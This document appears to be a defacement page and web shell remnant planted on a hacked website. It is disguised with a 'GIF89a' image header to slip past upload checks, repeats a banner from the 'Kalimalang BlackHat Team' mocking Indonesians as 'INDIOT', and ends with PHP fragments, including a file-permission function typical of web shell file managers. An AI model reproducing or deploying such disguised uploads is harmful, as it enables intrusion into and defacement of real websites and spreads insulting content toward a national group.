GIF89a;

<title>Touched Kalimalang BlackHat Team</title>
<img width="750" height="750" src="https://i.postimg.cc/nLVLKMrB/Screenshot-2024-08-16-21-22-53-87.jpg">

<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>
<center><h1>HAPPY 79TH INDONESIAN INDEPENDENCE DAY. 17 AUGUST 1945 - 17 AUGUST 2024, WE GIVE GIFTS TO INDIOT</h1></center>

author();

function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
};
